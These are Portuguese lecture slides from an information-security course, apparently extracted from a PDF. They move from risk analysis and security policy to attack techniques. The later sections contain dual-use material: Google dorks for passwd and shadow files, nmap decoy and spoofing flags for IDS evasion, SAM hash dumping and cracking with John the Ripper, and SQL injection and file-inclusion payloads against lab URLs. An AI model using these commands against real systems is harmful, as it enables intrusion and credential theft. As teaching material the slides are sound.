Segurança - BolinhaBolinha.com

Gestão de T.I.
POS683 – Redes de Comunicação
Aula 3
Prof. Rodrigo Rocha
[email protected]
http://www.bolinhabolinha.com
Requisitos da Segurança da Informação
ƒ Confidencialidade
ƒ Integridade
ƒ Disponibilidade
ƒ Autorização
ƒ Autenticação
ƒ Irrevogabilidade
ƒ Legalidade
1
ATENÇÃO
ƒ “TER RISCO SIGNIFICA TER UMA
CHANCE”
Riscos
2
Riscos
Conceitos (ISO Guide 51 e 73)
ƒ Risco
• combinação da probabilidade de um evento e de suas conseqüências
ƒ Probabilidade
• grau de possibilidade de que um evento (3.1.4) ocorra
• NOTA 1 – A ISO 3534-1:1993 fornece uma definição matemática da
probabilidade como “um número real entre 0 e 1 atribuído a um evento
aleatório. Pode se referir a uma freqüência relativa de ocorrência a longo
prazo ou a um grau de confiança de que um evento irá ocorrer. Para um alto
grau de confiança, a probabilidade é próxima de 1.”
• NOTA 3 – Os graus de confiança em relação à probabilidade podem ser
selecionados de classes ou categorias, tais como:
¾ rara / improvável / moderada / provável / quase certa, ou
¾ impossível / improvável / remota / ocasional / provável / freqüente
ƒ Evento
• ocorrência de um conjunto específico de circunstâncias; incidente
ƒ Conseqüência
• resultado de um evento; impacto
3
Risco vs Impacto
Conceitos (ISO Guide 51 e 73)
ƒ Ameaça
• fonte potencial de dano
• NOTA: O termo ameaça pode ser qualificado para definir sua origem
ou a natureza do dano esperado (por exemplo, ameaça de choque
elétrico, ameaça de esmagamento, ameaça de corte, ameaça de
intoxicação,ameaça de fogo, ameaça de afogamento).
ƒ vulnerabilidade
• circunstância na qual ativos, pessoas, propriedade ou o ambiente
ficam expostos a uma ou mais ameaças
4
Evento
Conceitos (ISO Guide 51 e 73)
ƒ análise de riscos (risk analysis)
• uso sistemático de informações disponíveis para identificar ameaças
e estimar riscos
ƒ avaliação de riscos (risk evaluation)
• procedimento baseado na análise de riscos para determinar se o
risco tolerável foi alcançado
ƒ análise e avaliação de riscos (risk assessment)
• processo completo que compreende uma análise de riscos e uma
avaliação de riscos
ƒ uso esperado
• uso de um produto, processo ou serviço de acordo com as
informações disponibilizadas pelo fornecedor
ƒ uso indevido previsível
• uso de um produto, processo ou serviço, em desacordo com o
fornecedor, mas que pode resultar de um comportamento humano
previsível
5
Processo iterativo de análise e avaliação de riscos
(risk assessment) e redução do risco
Importante
ƒ Ter definido o Escopo
• Podem ser feitos a nível de unidade de negócio, departamentos,
plataforma, aplicação ou níveis determinados pela empresa
ƒ Economia
• Calcular de forma precisa os riscos para evitar gastar mais com
segurança do que o prejuízo em potencial
ƒ Determinação do risco
• quantitativo
¾ probabilidade e severidade
¾ quase impossível, pois nem todas as variáveis são quantitativas (valor,
probabilidade,
b bilid d grau d
de iincerteza,
t
nível
í ld
de proteção,
t ã ...))
• qualitativo
¾ extimativa das perdas potenciais
ƒ Experiência
• Poucas empresas possuem registros históricos das falhas de
segurança, logo a avaliação depende da experiência da equipe
envolvida
6
Passo a passo
ƒ Identificar os ativos e seus valores
•
•
•
•
determinar os ativos e sua relevância com processos do negócio
valor de custo, valor para reposição, valor para reparo
importância para competição com concorrência
custo de desenvolvimento
desenvolvimento, etc
etc...
ƒ Identificar as ameaças e vulnerabilidades
•
•
•
questionários
entrevistas
técnicas (brainstorm, delphi, etc...)
ƒ Quantificar a probabilidade e o impacto nos negócios dessas
ameaças potenciais
ƒ Estimar a possível perda causada pela ameaça
•
•
custo da construção/aquisição
quanto perco pela quebra de confidencialidade
ƒ Fazer um comparativo econômico entre o impacto da ameaça e o
custo das contra-medidas
ƒ Documentar o processo de análise
ƒ Seleção das medidas de proteção
Passo a Passo
7
Equipe de análise de risco
ƒ Cargo de pessoas na equipe
•
•
•
•
•
gerentes
segurança física
donos de sistemas
administradores
analistas de segurança
ƒ Erros Comuns
•
•
•
•
•
Escopo infinito
Foco excessivo em tecnologia
Falta de comprometimento da direção
Falta de recursos
Periocidade deficiente
Exercícios
8
Workflow
ƒ Identificar os ativos críticos
ƒ Gerenciar o risco
• Associar uma probabilidade e impacto das
ameaças
• Priorizar ameaças
• Escolher estratégias de resposta
• Desenvolver um plano de segurança
ƒ Plano de recuperação de desastres
WorkFlow
Definição do contexto
Análise/Avaliação de risco
Comunicação do risco
Estimativa de risco
Avaliação de risco
Avaliaçã
o
OK?
Tratamento do risco
Monitora
amento e análise crítica de risco
Identificação de risco
Tratamento
OK?
Aceitação do risco
9
Modelo (Microsoft)
(Fonte: Microsoft.com)
Exercícios
ƒ
ƒ
Bibliografia COMPLEMENTAR
1-) Defina os termos
•
•
•
•
•
a-) Ameaça
b-) Agente da ameaça
c-) Vulnerabilidade
d) Severidade
e-) Impacto
ƒ
2-) Quais os principais benefícios da análise de Riscos?
ƒ
3-) Quando a análise de risco deve ser executada?
ƒ
4-) Descreva detalhadamente as principais etapas do processo de análise de
risco
ƒ
5-) Explique as alternativas em um processo de decisão derivado da avaliação
dos riscos
ƒ
6-) Quais os principais fatores a serem levados em consideração em uma análise
de custo x benefícios?
10
Políticas de Segurança
Definição
ƒ De acordo com a ISO 17799:2005
• Objetivo: Prover uma orientação e apoio da
direção para a segurança da informação de
acordo com os requisitos do negócio e com as
leis e regulamentações relevantes.
• Convém que a direção estabeleça uma política
clara, alinhada com os objetivos do negócio e
demonstre apoio e comprometimento com a
segurança da informação por meio da publicação
e manutenção de uma política de segurança da
informação para toda a organização.
11
Documento da política de segurança da informação
ƒ Controle
• Convém que um documento da política de segurança da informação
seja aprovado pela direção, publicado e comunicado para todos os
funcionários e partes externas relevantes.
ƒ Diretrizes
Diretri es para implementação
• Convém que o documento da política de segurança da informação
declare o comprometimento da direção e estabeleça o enfoque da
organização para gerenciar a segurança da informação. Convém que
o documento da política contenha declarações relativas a:
¾ a) uma definição de segurança da informação, suas metas globais, escopo e
importância da segurança da informação como um mecanismo que habilita o
compartilhamento da informação (ver introdução);
¾ b) uma declaração do comprometimento da direção, apoiando as metas e
princípios da segurança dainformação, alinhada com os objetivos e estratégias do
negócio;
Documento da política de segurança da informação
ƒ
c) uma estrutura para estabelecer os objetivos de controle e os controles,
incluindo a estrutura de análise/avaliação e gerenciamento de risco;
ƒ
d) breve explanação das políticas, princípios, normas e requisitos de
conformidade de segurança da informação específicos para a organização
organização,
incluindo:
• 1) conformidade com a legislação e com requisitos regulamentares e
contratuais;
• 2) requisitos de conscientização, treinamento e educação em segurança da
informação;
• 3) gestão da continuidade do negócio;
• 4) conseqüências das violações na política de segurança da informação;
ƒ
e) definição das responsabilidades gerais e específicas na gestão da segurança
da informação, incluindo o registro dos incidentes de segurança da informação;
ƒ
f) referências à documentação que possam apoiar a política, por exemplo,
políticas e procedimentos de segurança mais detalhados de sistemas de
informação específicos ou regras de segurança que os usuários devem seguir.
12
Atividade
ƒ
ƒ
ƒ
ƒ
1-) Definição da Empresa
2-) Selecionar uma área
3 ) Realizar
3-)
R li
uma análise
áli d
de risco
i
4-) Produzir políticas de segurança
Modelos
ƒ SANS
• http://www.sans.org/resources/policies/
ƒ http://www.ruskwig.com/security_policies.htm
ƒ http://www.dir.state.tx.us/security/policies/tem
plates.htm
13
Segurança Física
ƒ Segundo a NBR ISO/IEC 17799:2005,:
ƒ “Objetivo: Prevenir o acesso físico não autorizado,
ç
e
danos e interferências com as instalações
informações da organização.
ƒ Convém que as instalações de processamento da
informação críticas ou sensíveis sejam mantidas em
áreas seguras, protegidas por perímetros de
segurança definidos, com barreiras de segurança e
controles de acesso apropriados.
ƒ Convém que sejam fisicamente protegidas contra o
acesso não autorizado, danos e interferências.
ƒ Convém que a proteção oferecida seja compatível
com os riscos identificados.“
Dispositivos
ƒ Central de alarme
• Prevenção de sinistros
ƒ Monitoramento 24h
14
Dispositivos
ƒ Controle de Rondas
• sistema de controle de ronda inteligente
composto por um equipamento portátil de coleta
de dados, o Leitor Viggia, e um software de
controle de ronda
Dispositivos
ƒ Controle Biométrico
• Autenticação / Autorização
15
Dispositivos
ƒ Catraca Eletrônica
• Identificação
Dispositivos
ƒ Câmeras de segurança
Demo on line
http://200.161.28.199
http://62.55.154.23:40002/
ƒ Visão
Vi ã N
Noturna
16
Dispositivos
ƒ F.A.Q.:
O que é FPS?: Imagens(quadros) por segundo (is).
A gravação de 30 e 120 fps tem qualidade de gravação de 7,5i/s (usado
na maioria dos sistemas de seg
segurança,
rança peq
pequena
ena tr
truncada
ncada na imagem
gravada), a de 240fps tem de 15i/s (usado em menor escala no mercado,
quase tempo real) e a de 480 tem de 30i/s (tempo real , mesma taxa
utilizada em televisão e dvd).
O que é câmera CCD? : câmeras com tecnologia digital, requer uma
iluminação menor ou nenhuma, qualidade superior.
O que é câmera CMOS? : câmeras com tecnologia analógica que requer
uma iluminação maior e tem qualidade inferior.
Qual a diferença das lentes/mm? : As diferenças estao no alcance e no
grau de abertura, que dependem do local a ser instalado.
Dispositivos
ƒ Dome
ƒ Elemento protetor das câmeras contra poeira,
ventos e etc . Geralmente fixados no teto de forma a
ficarem discretos.
17
Dispositivos
ƒ Gravadores de vídeo
• Placa PCI
• DVR
¾HD Interna
OCR
ƒ Sistema de
reconhecimento
18
Footprint
ƒ Levantamento de Informações
Glossário
ƒ Tipos de Hackers
•
•
•
•
•
•
hacker
cracker
ethical hacker
white hat
black hat
gray hat
ƒ Fraquezas de segurança
•
•
•
•
•
•
•
•
script kiddie
hacktivismo
vulnerabilidade
Exploit / 0day
Empregados mal preparados / descontentes
Adminitradores imprudentes
Espionagem industrial
Wardriving
19
Funcionamento de um ataque
ƒ Levantamento de informações
• footprint
• fingerprint
• varreduras
ƒ Explorações
• força bruta
p
• exploits
• sql injection, etc.
ƒ Elevação de privilégios
ƒ Instalação de backdoor e ferramentas
ƒ Obtendo as informações privilegiadas
FootPrint
ƒ Levantamento de informações sobre o
sistema “alvo”;
ƒ É o iinício
í i para se traçar uma estratégia
é i
de ataque;
ƒ Sun Tzu (A arte da guerra)
• "O que possibilita ao soberano inteligente e seu
comandante
d t conquistar
i t o inimigo
i i i e realizar
li
façanhas fora do comum é a previsão,
conhecimento que só pode ser adquirido através
de homens que estejam a par de toda
movimentação do inimigo"
20
Por que garimpar informações ?
ƒ Sistemas são feitos por pessoas, e cada
pessoa é diferente (comportamento, humor,
caráter, fidelidade, etc...)
ƒ Os ataques são feitos contra uma
organização e não contra um único
equipamento
ƒ Suas chances diminuem muito devido a
medidas de segurança. (Exemplo: descobrir
um 0day para explorar um WebServer)
Engenharia Social
ƒ Requisitos
•
•
•
•
Gestão de pessoas
Boa Memória
Agradável
Simpático
Comunicação
Pro Ativo
Persuasível
Postura de “Chefe”
ƒ Interações
e ações co
com as pessoas
• Reciprocidade
• Modelo a ser seguido
Amável
Herói
21
Engenharia Social
ƒ Meios
•
•
•
•
•
Instante Messager
Forum
Second Life
E-Mail
Cara-a-Cara
Lista de Emails / Grupos
Comunidades Virtuais
Telefone
Web
ƒ Métodos
•
•
•
•
Pesquisas email/web
Ouvidos atentos
Escuta telefônica
Happy Hour
“Passeios” pela empresa
Empregados externos
Sala do café
É lá vamos nós !!
ƒ Informações sobre a empresa
• Aquisições / Fusões recentes
¾ maturidade no nível de segurança diferentes
¾ migrações
i
õ / iintegrações
t
õ d
de sistemas
i t
/ iinfra
f
• Aquisições de novos equipamentos
• WebSite
¾ muitas informações escondidas
¾ Possui extranet?
• DNS lookup
¾ servidor de nomes
¾ faixa de endereços
• Whois
¾ informações sobre o registro do domínio
• Blogs / Vagas de emprego / Forums / Orkut /
secondlife
22
Garimpando informações
ƒ Webpage da empresa
ƒ Histórico dos sites da empresa
• http://www.archive.org
Sites de Busca
ƒ http://www.dogpile.com
ƒ Grupos de E-mail
• http://groups.google.com/ - pesquisar @alvo.com.br
ƒ Sites
• Tribunais (Ex: http://www.tj.sp.gov.br )
• Telefônica
ƒ Livros sobre investigações
g ç
((investigador
g
p
particular))
• www.crimetime.com
23
Google\Yahoo Hacks
ƒ
Google (http://johnny.ihackstuff.com/ghdb.php)
•
•
“@alvo.com.br”
Arquivos do excel em determinado site
¾ site:www.alvo.com.br filetype:xls
• intitle:
intitle:"extranet
extranet “
• Procurando arquivos do word
¾ intitle:”index of” -inurl:htm -inurl:html docx
• Estatísticas do site
¾ intitle:"Usage Statistics for" "Generated by Webalizer“
• VNC
¾ intitle:"vnc" inurl:5800
• Cópias de arquivos importantes
¾ filetype:bak
fil
b k iinurl:"htaccess
l "h
| passwd
d | shadow
h d
|h
htuser""
ƒ
• Video server
¾ intitle:"live view" intitle:axis · intitle:axis intitle:"video server“
Yahoo
• Sites que apontam para a empresa
¾ linkdomain:alvo.com.br –alvo.com.br
Robots.txt
ƒ Arquivo padrão texto que é colocado no site
da empresa para “dizer” o que não deve ser
indexado pelos mecanismos de busca
• Google hacks
¾"robots.txt" "Disallow:" filetype:txt
24
Exemplo
ƒ whois
• whois alvo.com.br
ƒ registro.br
registro br
ping e traceroute
ƒ ping
• Verifica se o host responde a uma requisição
ICMP
ƒ traceroute / tracert
• Mostra a rota até chegar no host destino
ƒ On Line
• http://network-tools.com
• http://visualroute.visualware.com/
• http://ping.eu/
25
Ferramentas on-line
ƒ Não intrusivo
ƒ Ex: www.netcraft.com
• Whats that site running
“Rastrear” o e-mail
ƒ Olhando o cabeçalho
ƒ Logar via telnet no servidor
• telnet pop3.servidor.com.br 110
ƒ Autenticando
• user nome
nome_do_usuario
do usuario
• pass senha_do_usuario
ƒ Comandos
• Mostra a quantidade de mensagens e o espaço ocupado
¾ stat
• Mostrar lista das mensagens
¾ list
• Mostrar uma mensagem
¾ retr numero_mensagem
• Mostra o cabeçalho mais “n” linhas
¾ top numero_mensagem numero_linhas
• Marcar para deleção
¾ dele numero_mensagem
• Sair
¾ quit
26
Spider
ƒ Fazendo download do site inteiro
• wget
–r www.alvo.com.br
metagoofil
ƒ Extrai metadados de arquivos em determinados sites
• Google
¾ Site:alvo.com filetype: pdf
27
dnsenum
ƒ Coletar informações do DNS
• Tenta fazer transferência de zonas
Exercícios
ƒ
Em Grupo:
•
Levante as seguintes informações sobre a sua máquina. Quais comandos você utilizou:
¾
¾
¾
¾
¾
¾
ƒ
Endereço IP
Máscara
Classe da Rede (A,B ou C)
Servidor de DNS
Servidor DHCP
Gateway
Faça uma lista de 5 sites famosos e descubra qual sistema operacional está
rodando neles.
Escolha um site e levante todas as informações que puder (Exemplo: SO,IP,
registros,
g
, DNS,, etc...)) utilizando de técnicas não intrusivas.
•
•
Site:
Informações apuradas e como foram conseguidas:
ƒ Quais as formas de “tentar” minimar o processo de obtenção de
informações descritos nesta aula.
28
Funcionamento de um ataque
ƒ Levantamento de informações
• footprint
• fingerprint
• varreduras
ƒ Explorações
• força bruta
p
• exploits
• sql injection, etc.
ƒ Elevação de privilégios
ƒ Instalação de backdoor e ferramentas
ƒ Obtendo as informações privilegiadas
Verreduras
ƒ Levantamento de informações sobre o
sistema “alvo”;
ƒ Podemos
P d
utilizar
ili
fferramentas
automatizadas (muito “barulhenta”) ou
manuais (menos “barulhentas”)
ƒ Manual
• telnet <porta>
Ex: telnet 80
• echo “teste” | nc www.alvo.com 80 | grep
“<address>”
29
Varreduras - ferramentas
ƒ NMAP
• Sofisticado portscan (varredura de portas)
• Escrito por Fyodor
• Manual: http://nmap.org/man/pt-br/
NMap – tipos de varreduras
ƒ Sintaxe
• nmap <parametros> host –p porta
• Exemplo:
¾ nmap 192.168.0.1
ƒ Exemplos de uso
• Verificando o sistema operacional
¾ nmap 192.168.0.1 –O
• Não efetua ping (útil para firewall do windows)
¾ nmap 192.168.0.2 –P0
• Tentar obter a versão do serviço
¾ nmap 192.168.0.100 –sV
• Varrer
V
uma faixa
f i d
de IP
¾ nmap 10.0.0.1-100
• Criar um log da varredua
¾ nmap 10.0.0.1-254 –oN varretura.txt
• Scaneando uma faixa de IP procurando uma determinada porta
¾ nmap 10.0.0.1-250 –p 80
30
NMap – “Tentando” evitar Firewall/IDS
ƒ -T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane>
(Estabelece um padrão de temporização)
• “Nmap oferece seis padrões de temporização. Você pode
especificá los com a opção -T
especificá-los
T e os números (0 - 5) o
ou os
nomes. Os nomes de padrões são paranóico (paranoid,
0), furtivo (sneaky, 1), educado (polite, 2), normal (3),
agressivo (agressive, 4) e insano (insane, 5). Os dois
primeiros são para evitar um IDS. O modo educado (ou
polido), diminui o ritmo de escaneamento para usar
menos banda e recursos da máquina alvo
alvo. O modo
normal é o padrão e, portanto, -T3 não faz nada. O modo
agressivo acelera os scans assumindo que você está em
uma rede razoavelmente rápida e confiável. Finalmente, o
modo insano assume que você está em uma rede
extraordinariamente rápida ou está disposto a sacrificar
alguma precisão pela velocidade.”
NMap – “Tentando” evitar Firewall/IDS
ƒ -f (fragmenta os pacotes); --mtu (usando a MTU
especificada)
• “A idéia é dividir o cabeçalho TCP em diversos pacotes para tornar
mais difícil para os filtros de pacotes,
pacotes os sistemas de detecção de
intrusão, e outros aborrecimentos, detectar o que você está fazendo”
ƒ -D <chamariz1 [,chamariz2][,ME],...> (Disfarça um scan
usando chamarizes)
• “Faz com que um scan com chamarizes seja executado, o que parece
ao host remoto que, o(s) host(s) que você especificou como
chamarizes também estejam escaneando a rede-alvo. Com isso, o
IDS poderá reportar 5 a 10 scans de portas de endereços IP únicos,
mas não saberá qual IP estava realmente escaneando e qual era um
chamariz inocente. Embora isso possa ser desvendado através de
rastreamento de caminho de roteador, descarte de respostas
(response-dropping) e outros mecanismos ativos, normalmente é uma
técnica eficaz para esconder o seu endereço IP.”
31
NMap – “Tentando” evitar Firewall/IDS
ƒ -S <Endereço_IP> (Disfarça o endereço de origem)
• “Em algumas circunstâncias, o Nmap pode não conseguir determinar
o seu endereço de origem (o Nmap irá dizer se for esse o caso).
Nesta situação,
ç
use o -S com o endereço
ç IP da interface que
q você
deseja utilizar para enviar os pacotes.
• Outro uso possível para esta flag é para disfarçar o scan e fazer com
que os alvos achem que alguma outra pessoa está escaneando-as.
Imagine uma empresa que está constantemente sofrendo scan de
portas de um concorrente! A opção -e normalmente seria requerida
para este tipo de uso e -P0 seria recomendável.”
• Fonte: Manual do NMAP
SuperScan (Windows)
ƒ PortScanner
32
Banner grabber
ƒ Retirar informações através do banner do
aplicativo
• telnet IP porta
• Exemplo: telnet 192.168.0.100 21
HPING
ƒ Enviar pacotes “montados” TCP
ƒ hping alvo.com.br –p <porta>
ƒ Opções
• -F --fin set FIN flag
-S –syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U –urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
• -p <número porta>
33
Nessus
ƒ Instalando
• rpm –ivh Nessus-3.2.0-es5.i386.rpm
• rpm –ivh Nessus-Client-3.2.0-es5.i386.rpm
Nessus-Client-3 2 0-es5 i386 rpm
ƒ Criando o usuário
• /opt/nessus/sbin/nessus-add-first-user
ƒ Carregando servidor nessus
• /opt/nessus/sbin/nessusd -D
D&
ƒ carregando Cliente
• /opt/nessus/bin/NessusClient
Paraos
ƒ
ƒ
ƒ
ƒ
http://www.parosproxy.org
Proxy “local”
Pode ser utilizado para interceptar requisições GET e POST
Consegue visualizar e modificar campos “hidden” de
formulários
34
John the Ripper
ƒ Instalando
•
•
•
•
tar xzvf john-1.7.0.2.tar.gz
cd john-1
john-1.7.0.2/src
7 0 2/src
make clean linux-x86-any
cd ../run
ƒ Utilizando
• jjohn arquivo_senhas
q
_
ƒ Usando com dicionários
• john arquivo_senhas --wordlist=./dicionario.txt
Senhas Windows
ƒ bkhive-linux /mnt/hda1/WINDOWS/system32/config/system
saved-syskey.txt
ƒ samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam
saved syskey txt>password hashes txt
saved-syskey.txt>password-hashes.txt
ƒ john password-hashes.txt -w:eng.txt
ƒ http://www.plain-text.info/search/
35
Senhas
ƒ Senhas Fracas
• somente letras ou números
• poucos caracteres
• palavras conhecidas
¾ computador, teste, root, caneta, bolinha
• dados pessoais
¾ placa do carro, nomes, endereços, escola, sobrenome, datas, ...
ƒ Senhas
S h F
Fortes
t
• Combinação
¾ letras maiúsculas e minúsculas
¾ números
¾ caracteres especiais
¾ no mínimo 8 caracteres
Porque as senhas falham
ƒ Engenharia social
• através de “um bom papo e simpatia” conseguir dados
ƒ Adivinhação
• senhas
h utilizadas
tili d comumente
t ((root:root,
t
t admin:admin)
d i d i )
• senhas padrão
¾ http://defaultpassword.com/
¾ http://www.phenoelit-us.org/dpl/dpl.html
¾ http://www.cyxla.com/passwords/index.php
ƒ Força Bruta
•
•
•
•
Tentar todas as possíveis entradas
1,2,3,....,a,b,c,...z
11,12,13,14,...., zz
...
ƒ Dicionário
• Utilização de lista de palavras para facilitar as tentativas
• “chute direcionado”
36
Senhas fortes
ƒ possíveis combinações em um ataque de força bruta,
utilizando somente letras minúsculas e todos os caracteres
Aleatório é aleatório mesmo ?
ƒ Distribuição
37
Quebrando Senhas Windows
ƒ Utilizando backtrack
• boot via pendrive
• bkhive-linux
/mnt/hda1/Windows/System32/config/SYSTEM syskey.txt
• samdump2-linux
/mnt/hda1/Windows/System32/config/SAM syskey.txt >
hashes.txt
• Brute Force
¾ john --format=NT hashes.txt
• Dicionário
¾ john hashes.txt –w:dicionario.txt
• Raibow tables
¾ http://www.plain-text.info/search/
Tools
ƒ THC-HYDRA
• Brute force para vários serviços
38
Exercícios
ƒ 1-) Utilizando o software passutils.exe...
• a-) gere 10 senhas fracas, médias e fortes.
• b-) Coloque uma antiga senha utilizada por você e descubra o nível
de segurança da mesma.
• c-) Entre com seu usuário e senha de e-mail, clique em “revel
password”, vá para o Internet Explorer, selecione o password (****) e
vá novamente a tela do passutil. O que ela mostrou ?
ƒ 2-) Quais os principais passos para termos segurança no
processo de autenticação?
ƒ 3-) Quais são as fragilidades da utilização de senhas?
ƒ 4-) O que são senhas fortes e qual o problema da sua
utilização?
ƒ 5-) Qual seria uma solução para evitar o alto número de
senhas que temos que decorar hoje em dia?
Exercícios
ƒ 6-) Como posso tentar reduzir o tempo de um
ataque do tipo força bruta?
ƒ 7-) O que são raibow-tables?
ƒ 8-) O que são hashes ?
ƒ 9-) Como posso forçar a segurança em
senhas do windows e linux?
39
Ambiente WEB “estático”
ƒ Servidor
• IIS
• Apache
ƒ Cliente
• Browser
¾ IE
¾ FireFox
Ambiente Web “Dinâmico”
ƒ Servidor Web
ƒ Cliente
• Navegadores
ƒ Servidores
S id
d
de BD
40
Processo de registro de um domínio
ƒ Registrar o nome do domínio
• Nacional
¾http://www registro br
¾http://www.registro.br
• Internacional
¾Várias empresas são credenciadas
(http://www.internic.com/alpha.html)
ƒ 2 servidores de DNS
• Traduzem o nome www.seila.com
www seila com para um
endereço IP 200.200.20.1
Diretórios em servidor web
ƒ Internet Information Service - IIS
• C:\inetpub\wwwroot
ƒ Apache
• \var\www
ƒ Arquivos colocados nestes diretórios são lidos
pela raiz do site:
• Exemplo: c:\inetpub\www\seila.html
•
http://www.site.com.br/seila.html
41
Um pouco mais dinâmica
ƒ Uso de scripts
• Javascript
<script language="JavaScript">
language JavaScript >
nome = prompt("Diga-me seu nome:","“)}
document.write("<h1>Olá " + nome + "</h1>")
</script>
• Vbscript
<SCRIPT LANGUAGE="VBScript">
p
Nome=inputbox(“Digite um nome:”)
Msgbox(“Ola” & nome)
</SCRIPT>
Problema
ƒ Uma autenticação via client-side (Nunca faça isso em casa
!!!!)
<script language="javascript">
language javascript >
var ra = prompt("Digite seu RA:");
var senha = prompt("Digite sua senha:");
if(ra==11111111 && senha==1111)
{
document.writeln("<span class='style6'><br /><span
class='style11'>Seja muiiiito Bem Vindo !!!</span></span></span></div>");
}
else
{
document.writeln("<span class='style6'><br />Não
Autorizado</span></span></div>");
}
</script>
42
Precisamos de interação!!!
ƒ Aplicações web
•
•
•
•
Intranet
Extranet
Dinâmicas
Acesso a banco de dados
ƒ Linguagens
• Client side
¾ Escrita dentro da página html
¾ Usuário têm acesso ao código
g fonte
¾ Ex; javascript e vbscript
• Server side
¾ São processadas no servidor
¾ Servidor retorna resultado em forma de página html
¾ Usuários não conseguem ver o código fonte
Ambientes Server-Side
ƒ Windows
• Web: IIS
• Linguagem: ASP, ASP.NET
• Banco de Dados: SQL Server ou outros
ƒ Linux
• Web: Apache
• Linguagem: PHP
• Banco de Dados: Mysql, Postgre, outros
ƒ AMP
¾ Apache – Mysql – PHP
ƒ LAMP
• Linux – Apache – Mysql - PHP
43
Tipos de Ataques
ƒ Sql Injection
ƒ XSS - Cross Site Scripting
ƒ XPath
XP th
SQL Injection
ƒ Método de se inserir comandos SQL em entradas
de páginas web;
páginas
g
dinâmicas na web recebem p
parâmetros
ƒ As p
do usuário e repassam via consulta para o servidor
de banco de dados
• Exemplo: Login, consultas
ƒ Com o artifício do SQL Injection, é possível:
• entrar autenticado sem possuirmos credenciais
• realizar comandos SQL (Ex: drop table)
• inserir dados nas tabelas
ƒ Páginas que podem ser exploradas:
• ASP, JSP, CGI ou PHP
44
Laboratório
ƒ Entrando autorizado
Laboratório
ƒ No login posso tentar
• Campos numéricos
¾1 or 1=1
1 1
• Campos texto
¾‘ or ‘’=‘
• Caracter de “scape”
¾1 or 1=1 –
45
Laboratório
ƒ Inserindo dados
Laboratório
ƒ Utilizando as mensagens de erro
• http://localhost/noticia.asp?id=1 having 1=1
• http://localhost/noticia.asp?id=1 group by noticias.codigo having 1=1
• http://localhost/noticia.asp?id=1
http://localhost/noticia asp?id=1 group by noticias.codigo,titulo
noticias codigo titulo having
1=1
• http://localhost/noticia.asp?id=1 group by noticias.codigo,titulo,texto
having 1=1
ƒ Depois de descoberto os campos, adiciono uma notícia falsa
• http://localhost/noticia.asp?id=1%20group%20by%20noticias.codigo,ti
tulo,texto;INSERT%20INTO%20NOTICIAS(CODIGO,TITULO,TEXTO
)%20VALUES(9999,'Falencia','A%20empresa%20decretou%20fale
ncia');---
46
XSS – Cross Site Scripting
ƒ As vulnerabilidades Cross-site scripting (por
vezes chamado de XSS) ocorrem quando um
invasor usa uma aplicação web para enviar
código malicioso, geralmente na forma de um
script, para um outro usuário final. Estas
vulnerabilidades estão muito difundidas e
ocorrem sempre que uma aplicação web
utiliza a entrada do usuário na saída que
aplicação gera sem validá-la. (owasp)
Laboratório
ƒ
http://localhost/sobre.asp?pagina=sobrenos.htm
ƒ
http://localhost/sobre.asp?pagina=http://www.sitemalicioso.com/outrapagina.htm
47
Exercícios
ƒ 1-) Quais danos podem ser causados por ataques de Sql
Injection?
ƒ 2-)
2 ) O que é Bli
Blind
d SQL Injection?
I j ti ?
ƒ 3-) Quais as contra-medidas contra XSS e Sql Injection?
ƒ 4-) “Não mostrar mensagens de erros do servidor web são
suficientes para frustar tentativas de ataque”
ataque . Você concorda
com esta afirmação. Justifique.
ƒ 5-) O que é, e quais os problemas de uma backdoor web?
Criptografia
48
Requisitos da seg. da informação
ƒ Confidencialidade
• Garantir que a informação seja legível somente por pessoas
autorizadas
ƒ Integridade
• A mesma informação que foi enviada deve ser recebida. Não foi
alterada.
ƒ Disponibilidade
• Garantir que a informação estará lá quando for necessário
ƒ Autenticidade
• Das entidades
• Das origem das mensagens
ƒ Não Repúdio
• Garantir que a entidade “negue” a autoria da mensagem/ato
ƒ Anonimato
• Esconder a identidade
Falando em integridade
ƒ Exemplo
• “Meu sonho virou realidade! Finalmente saí de
férias. Não encontrei ninguém e por isso deixei o
relatório com a mulher do chefe. Prometo tirar
fotos !!!”
• “Meu sonho virou realidade! Finalmente saí de
férias. Não encontrei ninguém e por isso deixei o
relatório com a mulher do chefe. Prometo tirar
fotos !!!”
49
Criptografia
ƒ A palavra criptografia ´e composta pelos termos
gregos:
• kryptos = secreto
• grafo = escrita.
ƒ Criptografia Clássica
• Métodos para promover sigilo das informações
ƒ Criptografia Moderna
• Conjunto de técnicas computacionais e matemáticas para
atender aos requisitos da segurança da informação
Primitivas vs Requisitos
Primitivas
CIFRA
Requisitos de
Segurança
g
ç
Confidencialidade
Função de Hash
Integridade
Assinatura Digital
Autenticidade
Integridade
Não Repúdio
50
Cifras
ƒ Mecanismo para prover confidencialidade
(sigilo) nas informações
ƒ Composta
• Ciframento
• Deciframento
ƒ Componentes
• Texto em Claro
• Texto Cifrado
• Chave
Cifras
ƒ Cifragem de uma mensagem
51
Ciframento
ƒ Simétrico
• A partir da chave de ciframento é
computacionalmente fácil achar a chave de
deciframento
ƒ Assimétrico
• É computacionalmente “impossível” obter a chave
de deciframento a partir da chave de ciframento
• Chave pública e privada
Simétricas
ƒ
Vantagens
•
•
•
ƒ
Desvantagens
•
•
ƒ
Velocidade
Chaves pequenas
Atingem os objetivos de confidencialidade
Chave secreta compartilhada
Não permite autenticação e não repúdio
Principais algoritmos
•
•
•
•
•
a) DES (Data Encryption Standard): É o algoritmo simétrico mais difundidono mundo. Criado pela
IBM em 1977, com um tamanho de chave de 56 bits, relativamente pequeno para os padrões atuais,
foi quebrado por “força bruta” em 1997;
b) TripleDES: Uma variação do DES que utiliza 3 ciframentos em seqüência, empregando chaves
com tamanho de 112 ou 168 bits, sendo recomendado no lugar do DES desde 1993;
c) IDEA (International Data Encryption Algorithm): Criado em 1991, segue as mesmas idéias do
DES, mas tem execução mais rápida que o mesmo.
d) AES (Advanced Encryption Standard): É o padrão atual para ciframento recomendado pelo NIST
(National Institute of Standards and Technology). Trabalha com chaves de 128, 192 e 256 bits, que
adotou o cifrador Rijndael após a avaliação de vários outros;
e) RC6: A última versão de uma série de cifradores (RC2, RC3, RC4, RC5) desenvolvidos por
Rivest. Concorreu à adoção pelo padrão AES.
52
Substituição Simples
ƒ Júlio César
• Utilizada para troca de mensagens entre os generais
• Deslocamento (k) de 3 letras. Cada letra do alfabeto era substituída
pela terceira letra a direita
